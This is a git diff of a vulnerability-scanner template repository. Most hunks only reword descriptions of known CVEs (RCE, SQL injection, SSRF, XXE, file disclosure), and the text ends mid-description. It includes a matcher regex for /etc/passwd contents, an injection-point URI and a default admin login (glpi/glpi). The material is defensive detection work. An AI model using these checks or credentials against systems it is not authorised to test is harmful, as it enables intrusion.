cves/2019/CVE-2019-13462.yaml | 2 +- cves/2019/CVE-2019-15107.yaml | 2 +- cves/2019/CVE-2019-2767.yaml | 2 +- cves/2019/CVE-2019-5127.yaml | 2 +- cves/2019/CVE-2019-5418.yaml | 2 +- cves/2020/CVE-2020-11034.yaml | 2 +- cves/2020/CVE-2020-14883.yaml | 2 +- cves/2020/CVE-2020-25213.yaml | 4 ++-- cves/2020/CVE-2020-25540.yaml | 2 +- cves/2020/CVE-2020-26919.yaml | 2 +- cves/2020/CVE-2020-28871.yaml | 2 +- cves/2020/CVE-2020-28976.yaml | 2 +- cves/2020/CVE-2020-5847.yaml | 2 +- cves/2020/CVE-2020-7209.yaml | 2 +- cves/2020/CVE-2020-9402.yaml | 2 +- cves/2020/CVE-2020-9425.yaml | 2 +- cves/2021/CVE-2021-21972.yaml | 2 +- cves/2021/CVE-2021-28854.yaml | 2 +- cves/2021/CVE-2021-33221.yaml | 2 +- default-logins/glpi/glpi-default-credential.yaml | 2 +- dns/mx-service-detector.yaml | 2 +- exposures/files/yarn-lock.yaml | 2 +- fuzzing/iis-shortname.yaml | 2 +- iot/kevinlab-device-detect.yaml | 2 +- iot/xp-webcam.yaml | 4 ++-- miscellaneous/google-floc-disabled.yaml | 2 +- miscellaneous/joomla-htaccess.yaml | 4 ++-- miscellaneous/joomla-manifest-file.yaml | 4 ++-- miscellaneous/moodle-changelog.yaml | 2 +- misconfiguration/aem/aem-userinfo-servlet.yaml | 4 ++-- misconfiguration/exposed-service-now.yaml | 4 ++-- misconfiguration/http-missing-security-headers.yaml | 4 ++-- misconfiguration/laravel-debug-enabled.yaml | 4 ++-- network/deprecated-sshv1-detection.yaml | 2 +- network/mysql-native-cred-bruteforce.yaml | 2 +- network/openssh5.3-detect.yaml | 2 +- vulnerabilities/generic/open-redirect.yaml | 2 +- vulnerabilities/other/couchdb-adminparty.yaml | 2 +- vulnerabilities/other/eyelock-nano-lfd.yaml | 2 +- vulnerabilities/other/kevinlab-bems-backdoor.yaml | 2 +- vulnerabilities/other/kevinlab-hems-backdoor.yaml | 4 ++-- vulnerabilities/other/netgear-router-auth-bypass.yaml | 2 +- vulnerabilities/other/sar2html-rce.yaml | 2 +- .../springboot/springboot-actuators-jolokia-xxe.yaml | 4 ++-- workflows/azkaban-workflow.yaml | 4 ++-- workflows/bigip-workflow.yaml | 4 ++-- workflows/lucee-workflow.yaml | 4 ++-- workflows/springboot-workflow.yaml | 6 +++--- workflows/worksite-takeover-workflow.yaml | 4 ++-- 55 files changed, 74 insertions(+), 74 deletions(-) diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index f52b3c3c1a..2837b0aa42 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -4,7 +4,7 @@ info: name: PhpMyAdmin Scripts/setup.php Deserialization Vulnerability author: princechaddha severity: high - description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. + description: Setup script used to create PhpMyAdmin configurations can be fooled by using a crafted POST request to include arbitrary PHP code in the generated configuration file. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. reference: - https://www.phpmyadmin.net/security/PMASA-2009-3/ - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 @@ -33,4 +33,4 @@ requests: - type: regex regex: - - "root:.*:0:0:" \ No newline at end of file + - "root:.*:0:0:" diff --git a/cves/2009/CVE-2009-4223.yaml b/cves/2009/CVE-2009-4223.yaml index 5b336af011..c28fd9c671 100644 --- a/cves/2009/CVE-2009-4223.yaml +++ b/cves/2009/CVE-2009-4223.yaml @@ -2,7 +2,7 @@ id: CVE-2009-4223 info: name: KR-Web <= 1.1b2 RFI - description: KR is a web content-server based on Apache-PHP-MySql technology who gives to internet programmers some PHP classes semplifying database content access. Elsewere, it gives some admin and user tools to write, hyerarchize and authorize contents. + description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents. reference: - https://sourceforge.net/projects/krw/ - https://www.exploit-db.com/exploits/10216 diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml index e149113efa..d322c7908c 100644 --- a/cves/2013/CVE-2013-2251.yaml +++ b/cves/2013/CVE-2013-2251.yaml @@ -4,7 +4,7 @@ info: name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution author: exploitation,dwisiswant0,alex severity: critical - description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code. + description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized. Since said information will be evaluated as an OGNL expression against the value stack, this introduces the possibility to inject server side code. reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html tags: cve,cve2013,rce,struts,apache diff --git a/cves/2016/CVE-2016-5649.yaml b/cves/2016/CVE-2016-5649.yaml index 5fa539874d..2238126a04 100644 --- a/cves/2016/CVE-2016-5649.yaml +++ b/cves/2016/CVE-2016-5649.yaml @@ -4,7 +4,7 @@ info: name: NETGEAR DGN2200 / DGND3700 - Admin Password Disclosure author: suman_kar severity: critical - description: Vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. Attacker can use this password to gain administrator access of the targeted routers web interface. + description: A vulnerability exists within the page 'BSW_cxttongr.htm' which can allow a remote attacker to access this page without any authentication. The attacker can then use this password to gain administrator access of the targeted router's web interface. tags: cve,cve2016,iot,netgear,router reference: https://nvd.nist.gov/vuln/detail/CVE-2016-5649 @@ -32,4 +32,4 @@ requests: part: body group: 1 regex: - - 'Success "([a-z]+)"' \ No newline at end of file + - 'Success "([a-z]+)"' diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 78556fb50d..0677931936 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -3,7 +3,7 @@ id: CVE-2017-15715 info: name: Apache Arbitrary File Upload author: geeknik - description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename. + description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename. reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 severity: high tags: cve,cve2017,apache,httpd,fileupload @@ -42,4 +42,4 @@ requests: matchers: - type: dsl dsl: - - 'contains(body_2, "{{randstr_1}}")' \ No newline at end of file + - 'contains(body_2, "{{randstr_1}}")' diff --git a/cves/2017/CVE-2017-18638.yaml b/cves/2017/CVE-2017-18638.yaml index bf1abb9b15..fc7f16e8cc 100644 --- a/cves/2017/CVE-2017-18638.yaml +++ b/cves/2017/CVE-2017-18638.yaml @@ -4,7 +4,7 @@ info: name: Graphite 'graphite.composer.views.send_email' SSRF author: huowuzhao severity: high - description: send_email in graphite-web/webapp/graphite/composer/views.py in Graphite through 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an e-mail address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. + description: Graphite's send_email in graphite-web/webapp/graphite/composer/views.py in versions up to 1.1.5 is vulnerable to SSRF. The vulnerable SSRF endpoint can be used by an attacker to have the Graphite web server request any resource. The response to this SSRF request is encoded into an image file and then sent to an email address that can be supplied by the attacker. Thus, an attacker can exfiltrate any information. reference: - http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html - https://github.com/graphite-project/graphite-web/issues/2008 diff --git a/cves/2019/CVE-2019-13462.yaml b/cves/2019/CVE-2019-13462.yaml index 7ad030cba0..41c5e358b9 100644 --- a/cves/2019/CVE-2019-13462.yaml +++ b/cves/2019/CVE-2019-13462.yaml @@ -5,7 +5,7 @@ info: author: divya_mudgal severity: critical reference: https://www.nccgroup.com/ae/our-research/technical-advisory-unauthenticated-sql-injection-in-lansweeper/ - description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameter to the /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI. + description: Lansweeper web application through 7.1.115.4 allows unauthenticated SQL injection via the "row" and "column" GET parameters to /WidgetHandler.ashx?MethodName=Sort&ID=1&column=INJECTION&row=INJECTION URI. tags: cve,cve2019,sqli,lansweeper requests: diff --git a/cves/2019/CVE-2019-15107.yaml b/cves/2019/CVE-2019-15107.yaml index c04cf98e43..2229b3f142 100644 --- a/cves/2019/CVE-2019-15107.yaml +++ b/cves/2019/CVE-2019-15107.yaml @@ -4,7 +4,7 @@ info: name: Webmin <= 1.920 Unauthenticated Remote Command Execution author: bp0lr severity: high - description: An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability. + description: An issue was discovered in Webmin <=1.920. The 'old' parameter in password_change.cgi contains a command injection vulnerability. reference: https://pentest.com.tr/exploits/DEFCON-Webmin-1920-Unauthenticated-Remote-Command-Execution.html tags: cve,cve2019,webmin,rce diff --git a/cves/2019/CVE-2019-2767.yaml b/cves/2019/CVE-2019-2767.yaml index 0ee815a902..3478b09508 100644 --- a/cves/2019/CVE-2019-2767.yaml +++ b/cves/2019/CVE-2019-2767.yaml @@ -4,7 +4,7 @@ info: name: Oracle Business Intelligence - Publisher XXE author: madrobot severity: high - description: Vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported version that is affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher (formerly XML Publisher). + description: There is an XXE vulnerability in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise BI Publisher. reference: - https://nvd.nist.gov/vuln/detail/CVE-2019-2767 - https://www.exploit-db.com/exploits/46729 diff --git a/cves/2019/CVE-2019-5127.yaml b/cves/2019/CVE-2019-5127.yaml index f0951986e7..d283867419 100644 --- a/cves/2019/CVE-2019-5127.yaml +++ b/cves/2019/CVE-2019-5127.yaml @@ -4,7 +4,7 @@ info: name: YouPHPTube Encoder RCE author: pikpikcu severity: critical - description: A command injection have been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3 a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. + description: A command injection vulnerability has been found in YouPHPTube Encoder. A successful attack could allow an attacker to compromise the server. Exploitable unauthenticated command injections exist in YouPHPTube Encoder 2.3, a plugin for providing encoder functionality in YouPHPTube. The parameter base64Url in /objects/getImage.php is vulnerable to a command injection attack. reference: https://talosintelligence.com/vulnerability_reports/TALOS-2019-0917 tags: cve,cve2019,rce diff --git a/cves/2019/CVE-2019-5418.yaml b/cves/2019/CVE-2019-5418.yaml index 5639b9366a..b6a5302242 100644 --- a/cves/2019/CVE-2019-5418.yaml +++ b/cves/2019/CVE-2019-5418.yaml @@ -4,7 +4,7 @@ info: name: File Content Disclosure on Rails author: omarkurt severity: medium - description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's filesystem to be exposed. + description: There is a File Content Disclosure vulnerability in Action View <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 where specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed. reference: - https://github.com/omarkurt/CVE-2019-5418 - https://weblog.rubyonrails.org/2019/3/13/Rails-4-2-5-1-5-1-6-2-have-been-released/ diff --git a/cves/2020/CVE-2020-11034.yaml b/cves/2020/CVE-2020-11034.yaml index 126476f33d..c43c5b0539 100644 --- a/cves/2020/CVE-2020-11034.yaml +++ b/cves/2020/CVE-2020-11034.yaml @@ -4,7 +4,7 @@ info: name: GLPI v.9.4.6 - Open redirect author: pikpikcu severity: low - description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection based which is based on a regexp. This is fixed in version 9.4.6. + description: In GLPI before version 9.4.6, there is a vulnerability that allows bypassing the open redirect protection, which is based on a regexp. This is fixed in version 9.4.6. reference: - https://github.com/glpi-project/glpi/security/advisories/GHSA-gxv6-xq9q-37hg - https://github.com/glpi-project/glpi/archive/9.4.6.zip diff --git a/cves/2020/CVE-2020-14883.yaml b/cves/2020/CVE-2020-14883.yaml index 84fa26ca9a..9deaa4c983 100644 --- a/cves/2020/CVE-2020-14883.yaml +++ b/cves/2020/CVE-2020-14883.yaml @@ -4,7 +4,7 @@ info: name: Oracle WebLogic Server Administration Console Handle RCE author: pdteam severity: critical - description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. + description: Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883 tags: cve,cve2020,oracle,rce,weblogic diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index 987eee7315..88ec587026 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -4,7 +4,7 @@ info: name: WP File Manager RCE author: foulenzer severity: critical - description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability. + description: The vulnerability allows unauthenticated remote attackers to upload .php files. This template only detects the plugin, not its vulnerability. reference: - https://plugins.trac.wordpress.org/changeset/2373068 - https://github.com/w4fz5uck5/wp-file-manager-0day @@ -61,4 +61,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/cves/2020/CVE-2020-25540.yaml b/cves/2020/CVE-2020-25540.yaml index 92402a073f..822c9f5ef4 100644 --- a/cves/2020/CVE-2020-25540.yaml +++ b/cves/2020/CVE-2020-25540.yaml @@ -4,7 +4,7 @@ info: name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540) author: geeknik severity: medium - description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter. + description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter. reference: https://www.exploit-db.com/exploits/48812 tags: cve,cve2020,thinkadmin,lfi diff --git a/cves/2020/CVE-2020-26919.yaml b/cves/2020/CVE-2020-26919.yaml index cc1e8636a0..8381e16ece 100644 --- a/cves/2020/CVE-2020-26919.yaml +++ b/cves/2020/CVE-2020-26919.yaml @@ -4,7 +4,7 @@ info: name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: It was found that every section of the web could be used as a valid endpoint to submit POST requests being the action defined by the submitId argument. The problem was located in the login.html webpage, that has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow users execute system commands. + description: NETGEAR ProSAFE Plus was found to allow any HTML page as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands. reference: - https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/ - https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/ diff --git a/cves/2020/CVE-2020-28871.yaml b/cves/2020/CVE-2020-28871.yaml index 2ce50c5cfa..4e77e68e53 100644 --- a/cves/2020/CVE-2020-28871.yaml +++ b/cves/2020/CVE-2020-28871.yaml @@ -4,7 +4,7 @@ info: name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution author: gy741 severity: critical - description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. + description: This template detects a remote code execution (RCE) vulnerability in Monitorr 1.7.6m. Improper input validation and lack of authorization leads to arbitrary file uploads in the web application. An unauthorized attacker with web access to could upload and execute a specially crafted file, leading to remote code execution within the Monitorr. reference: - https://nvd.nist.gov/vuln/detail/CVE-2020-28871 - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/ diff --git a/cves/2020/CVE-2020-28976.yaml b/cves/2020/CVE-2020-28976.yaml index 00e084429e..3ecd474e88 100644 --- a/cves/2020/CVE-2020-28976.yaml +++ b/cves/2020/CVE-2020-28976.yaml @@ -4,7 +4,7 @@ info: name: Wordpress Plugin Canto 1.3.0 - Blind SSRF (Unauthenticated) author: LogicalHunter severity: high - description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker can make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. + description: The Canto plugin 1.3.0 for WordPress contains a blind SSRF vulnerability. It allows an unauthenticated attacker to make a request to any internal and external server via /includes/lib/detail.php?subdomain=SSRF. reference: - https://www.exploit-db.com/exploits/49189 - https://nvd.nist.gov/vuln/detail/CVE-2020-28976 diff --git a/cves/2020/CVE-2020-5847.yaml b/cves/2020/CVE-2020-5847.yaml index fd2fcf9241..08d43a9cd4 100644 --- a/cves/2020/CVE-2020-5847.yaml +++ b/cves/2020/CVE-2020-5847.yaml @@ -3,7 +3,7 @@ info: name: UnRaid Remote Code Execution author: madrobot severity: high - description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbirary code. + description: A vulnerability in UnRaid allows remote unauthenticated attackers to execute arbitrary code. reference: https://sysdream.com/news/lab/2020-02-06-cve-2020-5847-cve-2020-5849-unraid-6-8-0-unauthenticated-remote-code-execution-as-root/ tags: cve,cve2020,rce diff --git a/cves/2020/CVE-2020-7209.yaml b/cves/2020/CVE-2020-7209.yaml index e4043100bf..d08e8d811a 100644 --- a/cves/2020/CVE-2020-7209.yaml +++ b/cves/2020/CVE-2020-7209.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: critical tags: cve,cve2020,rce - description: LinuxKI v6.0-1 and earlier is vulnerable to an remote code execution which is resolved in release 6.0-2. + description: LinuxKI v6.0-1 and earlier are vulnerable to a remote code execution. This is resolved in release 6.0-2. reference: - http://packetstormsecurity.com/files/157739/HP-LinuxKI-6.01-Remote-Command-Injection.html - http://packetstormsecurity.com/files/158025/LinuxKI-Toolset-6.01-Remote-Command-Execution.html diff --git a/cves/2020/CVE-2020-9402.yaml b/cves/2020/CVE-2020-9402.yaml index 3e012c49bd..c9f38d9a42 100644 --- a/cves/2020/CVE-2020-9402.yaml +++ b/cves/2020/CVE-2020-9402.yaml @@ -2,7 +2,7 @@ id: CVE-2020-9402 info: name: Django SQL Injection - description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allows SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it was possible to break escaping and inject malicious SQL. + description: Django 1.11 before 1.11.29, 2.2 before 2.2.11, and 3.0 before 3.0.4 allow SQL Injection if untrusted data is used as a tolerance parameter in GIS functions and aggregates on Oracle. By passing a suitably crafted tolerance to GIS functions and aggregates on Oracle, it is possible to break character escaping and inject malicious SQL. reference: - https://github.com/vulhub/vulhub/tree/master/django/CVE-2020-9402 - https://docs.djangoproject.com/en/3.0/releases/security/ diff --git a/cves/2020/CVE-2020-9425.yaml b/cves/2020/CVE-2020-9425.yaml index a03934277c..2336c16344 100644 --- a/cves/2020/CVE-2020-9425.yaml +++ b/cves/2020/CVE-2020-9425.yaml @@ -3,7 +3,7 @@ info: name: rConfig Unauthenticated Sensitive Information Disclosure author: madrobot severity: high - description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application was not exiting after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response. + description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response. reference: - https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153 - https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9 diff --git a/cves/2021/CVE-2021-21972.yaml b/cves/2021/CVE-2021-21972.yaml index 9b852d57e9..4e9eb24eec 100644 --- a/cves/2021/CVE-2021-21972.yaml +++ b/cves/2021/CVE-2021-21972.yaml @@ -5,7 +5,7 @@ info: author: dwisiswant0 severity: critical reference: https://swarm.ptsecurity.com/unauth-rce-vmware/ - description: The vulnerability allows unauthenticated remote attackers to upload file leading to remote code execution (RCE). This templates only detects the plugin. + description: The vulnerability allows unauthenticated remote attackers to upload files leading to remote code execution (RCE). This templates only detects the plugin. tags: cve,cve2021,vmware,rce requests: diff --git a/cves/2021/CVE-2021-28854.yaml b/cves/2021/CVE-2021-28854.yaml index 4a9b0724e2..0cf3986bfe 100644 --- a/cves/2021/CVE-2021-28854.yaml +++ b/cves/2021/CVE-2021-28854.yaml @@ -4,7 +4,7 @@ info: name: VICIdial - Multiple sensitive Information disclosure author: pdteam severity: high - description: VICIdial's Web Client contains many sensitive files that can be access from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/21 + description: VICIdial's Web Client contains many sensitive files that can be accessed from the client side. These files contain mysqli logs, auth logs, debug information, successful and unsuccessful login attempts with their corresponding IP's, User-Agents, credentials and much more. This information can be leveraged by an attacker to gain further access to VICIdial systems. This vulnerability affects all versions as of 20/5/2021. reference: https://github.com/JHHAX/VICIdial tags: cve,cve2021 diff --git a/cves/2021/CVE-2021-33221.yaml b/cves/2021/CVE-2021-33221.yaml index 0426b0eee2..b64016ff6a 100644 --- a/cves/2021/CVE-2021-33221.yaml +++ b/cves/2021/CVE-2021-33221.yaml @@ -3,7 +3,7 @@ id: CVE-2021-33221 info: name: CommScope Ruckus IoT Controller Unauthenticated Service Details author: geeknik - description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices uses for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). + description: A 'service details' API endpoint discloses system and configuration information to an attacker without requiring authentication. This information includes DNS and NTP servers that the devices use for time and host resolution. It also includes the internal hostname and IoT Controller version. A fully configured device in production may leak other, more sensitive information (API keys and tokens). reference: https://www.commscope.com/globalassets/digizuite/917216-faq-security-advisory-id-20210525-v1-0.pdf severity: medium tags: cve,cve2021,commscope,ruckus,debug diff --git a/default-logins/glpi/glpi-default-credential.yaml b/default-logins/glpi/glpi-default-credential.yaml index 951b8b696c..800d8aef3a 100644 --- a/default-logins/glpi/glpi-default-credential.yaml +++ b/default-logins/glpi/glpi-default-credential.yaml @@ -4,7 +4,7 @@ info: author: andysvints severity: high tags: glpi,default-login - description: GLPI is an ITSM software tool that helps you plan and manage IT changes. Checking is default super admin account(glpi/glpi) is enabled. + description: GLPI is an ITSM software tool that helps you plan and manage IT changes. This template checks if a default super admin account (glpi/glpi) is enabled. reference: https://glpi-project.org/ requests: diff --git a/dns/mx-service-detector.yaml b/dns/mx-service-detector.yaml index 03d63d443f..0b0ea1c0d4 100644 --- a/dns/mx-service-detector.yaml +++ b/dns/mx-service-detector.yaml @@ -4,7 +4,7 @@ info: name: E-mail service detector author: binaryfigments severity: info - description: Check the email service or spamfilter that is used for a domain. + description: Check the email service or spam filter that is used for a domain. tags: dns dns: diff --git a/exposures/files/yarn-lock.yaml b/exposures/files/yarn-lock.yaml index f2b729f35b..d75da95303 100644 --- a/exposures/files/yarn-lock.yaml +++ b/exposures/files/yarn-lock.yaml @@ -4,7 +4,7 @@ info: name: yarn lock file disclosure author: oppsec severity: info - description: yarn.lock is a file which store all exactly versions of each dependency were installed. + description: The yarn.lock file stores the versions of each Yarn dependency installed. tags: exposure requests: diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 802ed499db..40ef7fe623 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -3,7 +3,7 @@ info: name: iis-shortname author: nodauf severity: info - description: If IIS use old .Net Framwork it's possible to enumeration folder with the symbol ~. + description: When IIS uses an old .Net Framwork it's possible to enumeration folder with the symbol ~. tags: fuzz reference: diff --git a/iot/kevinlab-device-detect.yaml b/iot/kevinlab-device-detect.yaml index 2f33447a4c..dccb08d14b 100644 --- a/iot/kevinlab-device-detect.yaml +++ b/iot/kevinlab-device-detect.yaml @@ -2,7 +2,7 @@ id: kevinlab-device-detect info: name: KevinLAB Devices Detection - description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control. + description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings by collecting and analyzing various information of energy usage and facilities as well as efficiency and indoor environment control. author: gy741 severity: info tags: iot diff --git a/iot/xp-webcam.yaml b/iot/xp-webcam.yaml index f9942032ad..f7578077c4 100644 --- a/iot/xp-webcam.yaml +++ b/iot/xp-webcam.yaml @@ -4,7 +4,7 @@ info: name: XP Webcam Viewer Page author: aashiq severity: medium - description: Searches for exposed webcams by querying the /mobile.html endpoint and existance of webcamXP in the body + description: Searches for exposed webcams by querying the /mobile.html endpoint and the existence of webcamXP in the body. tags: webcam,iot requests: @@ -23,4 +23,4 @@ requests: words: - "Please provide a valid username/password to access this server." part: body - negative: true \ No newline at end of file + negative: true diff --git a/miscellaneous/google-floc-disabled.yaml b/miscellaneous/google-floc-disabled.yaml index 5db3fc078d..04184c7821 100644 --- a/miscellaneous/google-floc-disabled.yaml +++ b/miscellaneous/google-floc-disabled.yaml @@ -3,7 +3,7 @@ id: google-floc-disabled info: name: Google FLoC Disabled author: geeknik - description: The detected website has decided to explicity exclude itself from Google FLoC tracking. + description: The detected website has decided to explicilty exclude itself from Google FLoC tracking. reference: https://www.bleepingcomputer.com/news/security/github-disables-google-floc-user-tracking-on-its-website/ severity: info tags: google,floc,misc diff --git a/miscellaneous/joomla-htaccess.yaml b/miscellaneous/joomla-htaccess.yaml index 1797130f74..ad0de0cd6f 100644 --- a/miscellaneous/joomla-htaccess.yaml +++ b/miscellaneous/joomla-htaccess.yaml @@ -4,8 +4,8 @@ info: name: Joomla htaccess file disclosure author: oppsec severity: info - description: Joomla have a htaccess file to store some configuration about HTTP Config, Directory Listening etc... - tags: misc + description: Joomla has an htaccess file to store configurations about HTTP config, directory listing, etc. + tags: misc,joomla requests: - method: GET diff --git a/miscellaneous/joomla-manifest-file.yaml b/miscellaneous/joomla-manifest-file.yaml index 81b47737ad..99d9cb4e1a 100644 --- a/miscellaneous/joomla-manifest-file.yaml +++ b/miscellaneous/joomla-manifest-file.yaml @@ -4,8 +4,8 @@ info: name: Joomla manifest file disclosure author: oppsec severity: info - description: joomla.xml is a xml file which stores some informations about installed Joomla, like version, files and paths. - tags: misc + description: joomla.xml is a file which stores information about installed Joomla, such as version, files, and paths. + tags: misc,joomla requests: - method: GET diff --git a/miscellaneous/moodle-changelog.yaml b/miscellaneous/moodle-changelog.yaml index c6db772dcd..8f73d5040e 100644 --- a/miscellaneous/moodle-changelog.yaml +++ b/miscellaneous/moodle-changelog.yaml @@ -4,7 +4,7 @@ info: name: Moodle Changelog File author: oppsec severity: info - description: Moodle have a file which describes API changes in core libraries and APIs, can be used to discover Moodle version. + description: Moodle has a file which describes API changes in core libraries and APIs, and can be used to discover Moodle version. tags: misc requests: diff --git a/misconfiguration/aem/aem-userinfo-servlet.yaml b/misconfiguration/aem/aem-userinfo-servlet.yaml index e7b1b39316..f20d99bbc1 100644 --- a/misconfiguration/aem/aem-userinfo-servlet.yaml +++ b/misconfiguration/aem/aem-userinfo-servlet.yaml @@ -4,7 +4,7 @@ info: author: DhiyaneshDk name: AEM UserInfo Servlet severity: info - description: UserInfoServlet is exposed, it allows to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from 